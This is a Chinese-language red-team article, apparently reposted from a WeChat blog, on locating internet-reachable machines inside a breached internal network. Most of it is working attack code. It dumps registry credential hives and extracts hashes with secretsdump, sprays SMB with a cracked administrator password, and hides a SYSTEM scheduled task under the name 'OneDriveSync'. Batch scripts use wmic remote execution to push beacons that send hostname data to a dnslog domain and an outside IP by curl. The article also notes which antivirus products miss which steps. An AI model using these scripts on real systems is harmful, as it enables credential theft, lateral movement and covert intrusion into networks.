如何在目标内网中快速定位 出网机

  • A+
所属分类:安全文章

如何在目标内网中快速定位 出网机

声明:
    文章初衷仅为攻防研究学习交流之用,严禁利用相关技术去从事一切未经合法授权的入侵攻击破坏活动,因此所产生的一切不良后果与本文作者及该公众号无任何关联
    
    另外,这只是一个个人性质的公众号(非任何商业营销号),目的也仅为技术分享交流,除了公众号自身,将不再考虑做其他任何推广 ( 细心的你,可能也发现了,至今为止,甚至连一则外部广告都不曾出现过 ),故,严禁所有未经本人明确授权的恶意转载 及 非法营销牟利行为


0x01 实战场景说明

    长期以来,非常多的组织,机构,企业...由于各种各样的原因,为加大对内网的管控力度,可能会通过各种各样的手段,去限制内网机随意访问外网,比如,针对普通办公网的各种商业安全审计系统,针对DMZ的各种acl策略限制 , 各种"软硬"隔离 等等等...诸如此类


    日常内网渗透中,可能会经常遇到这样的情况,拿到webshell之后发现当前机器无法正常访问外网(不能出网), 经简单尝试 DNS,Tcp,Udp,icmp... 均无法正常出( 此处的Tcp,主要针对 80,443,53,8080,21,110 这些穿透性稍好的端口)

    

    确实,利用各种正向代理依然可以继续去搞内网,甚至做维持,搞内网可能问题不大,但如果是维持,成本可能就稍微有些高了,所以,最好的方式还是能想办法找台能正常出网的内网机稳住才行,以此作为后续的长期入口( 依然是那句话,当前机器不出网,不代表所有机器都不出网,当前内网段不出网,也不代表所有内网段都不出网,慢慢耐心找,体力活同样,此处暂不考虑极个别极端情况),ok,前面都是废话,接着就简单来看下,怎么在目标内网中去批量找出网机



0x02 实操过程


第一步,提取所有本地用户密码hash

    假设前期通过Web提到了一台目标内网机权限,发现其无法正常出网后,接着走正常流程,先把本地hash提取一下,解密得知administrator的明文密码为[email protected]#45,注意,此处的reg转储动作大部分杀软/EDR基本都不太会干预 ( 360套装[卫士 + 杀毒]并未拦 )

# cd c:/users/public# reg save HKLMSYSTEM sys.hiv# reg save HKLMSAM sam.hiv# reg save hklmsecurity security.hiv# secretsdump_windows.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL# del *.hiv secretsdump_windows.exe /F

如何在目标内网中快速定位 出网机


第二步,批量SMB喷射

    拿着上面解出的密码,对指定内网存活机进行批量SMB喷射 (即所有开了135端口的ip列表,因为后需要利用wmi远程执行[计划任务和系统服务也是同理,扫445的IP即可]) ,check.bat 如下 smbcheck.exe 放到bat同目录下

smbbru.exe -s 192.168.159.0/24 -u administrator -p [email protected]#45 -t 12


    由于喷射过程时间稍长,故可直接利用本地计划任务去起它 (注,部分杀软/EDR可能会拦截schtasks.exe)

# schtasks /create /RL HIGHEST /F /tn "OneDriveSync" /tr "C:/Users/Public/check.bat" /sc DAILY /mo 1 /ST 08:25 /RU SYSTEM# schtasks /query | findstr "OneDriveSync"# schtasks /run /tn OneDriveSync# schtasks /delete /F /tn OneDriveSync

如何在目标内网中快速定位 出网机

    

    稍等片刻,最终喷射结果如下,其实有很多管理员自身是有一定的安全意识的,只是不怎么完善,或者说懒,嫌麻烦而已,比如,他也确实也知道要把自己的系统密码设的复杂一些,但日常要管理的机器数量可能比较庞大,加之工作繁杂,图方便省心,就免不了会出现一个密码通杀一批机器的现象,所以,只要想办法抓到一些关键的系统账号密码,估计很多机器都要跟着受牵连,即使不能通杀很多,但其它的系统密码可能也都是基于现在的这个密码演变的,不妨试着猜猜

如何在目标内网中快速定位 出网机


    第三步,最后,拿着上面喷射成功的列表,开始批量查找出网机( 即 出网刺探 )

    NetInfo.bat 如下, 刺探项主要包括 DNS,TCP的 80,443,53,8080端口,其它端口后续可根据自己的实际情况酌情加( icmp,udp此处暂不做说明 )

ping %COMPUTERNAME%.%PROCESSOR_ARCHITECTURE%.9345mt.dnslog.cn -n 2 -w 2for %%k in (80,53,8080,443do @C:userspubliccurl.exe -X POST -d "{ %COMPUTERNAME%.%PROCESSOR_ARCHITECTURE% }" --connect-timeout 2 -m 3 --retry 1 -k --retry-delay 1 -s --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36" --referer "https://www.baidu.com" http://21.227.183.159:%%k

    

    scan.bat 如下 [ 注,此处用的wmic去远程执行,故暂不考虑 2008以下的系统,另外,由于远程执行命令默认调的cmd.exe,360会拦,但也并不是所有的杀软/EDR都会拦

@echo off for /f "delims=" %%i in (host.txt) do @(  echo.  echo %%i Rce Begining ...  net use \%%ic$ /user:"administrator" "[email protected]#45" > null  copy NetInfo.bat \%%ic$userspublic /y > null  copy curl.exe \%%ic$userspublic /y > null  echo.  wmic /node:%%i /user:".administrator" /password:"[email protected]#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"  ping 127.0.0.1 -n 42 > null  echo.  echo.  del \%%ic$userspublicNetInfo.bat /F  del \%%ic$userspubliccurl.exe /F  net use \%%ic$ /del  > nul)

    

    Wmic.exe 本身其实也是支持直接批量远程执行的,但实际中经常会出现命令没有执行成功的情况,所以,还是直接用批处理for一下比较稳妥

wmic /node:@iplist.txt /user:".administrator" /password:"[email protected]#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"

    
    最终, 实际的 批量出网刺探 效果如下,注意,此处的dnslog 平台非常建议不要直接用别人的,自己搭一个就好,反正都是基础设施的一部分,必不可少

如何在目标内网中快速定位 出网机

如何在目标内网中快速定位 出网机

   

    执行脚本前,记得先到自己的VPS上把那些向外刺探的端口全部同时监听起来,主要通过这个看下到底 哪台机器的哪个端口能正常接到数据,后续迁徙到对应的那台机器上操作即可

# nc -lkvp 80

如何在目标内网中快速定位 出网机


小结:

    至止,关于内网出网机批量查找就结束了,非常简单,之前经常有弟兄会问到,所以此处就做一次集中说明,实战中还是建议把上面脚本的功能全部再用其他语言自行重新实现,文中所有的脚本仅作demo效果参考,包括之前文章中的各种脚本,仅仅也都只是为了做demo效果演示,实际存活率可能并不怎么样,故,最好的方式还是要自己动手丰衣足食,ok,还是那句话,一篇文章只解决一个实际问题,就不多废话了,有任何问题,也欢迎弟兄们及时反馈,祝好运如何在目标内网中快速定位 出网机


    如果觉得确实还不错,也欢迎积极转发留言,以便让更多真正需要的人都能看到,如遇到文中错误,也欢迎随时私信指正,非常感谢如何在目标内网中快速定位 出网机


周末的清晨可能需要一首这样的音乐来解乏

    

    非常期待能和更多真正志同道合弟兄一起深入交流学习,( 还是那句话,维护不易,乱七八糟的人就不要来了,非常感谢 )

如何在目标内网中快速定位 出网机


本文始发于微信公众号(红队防线):如何在目标内网中快速定位 出网机

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: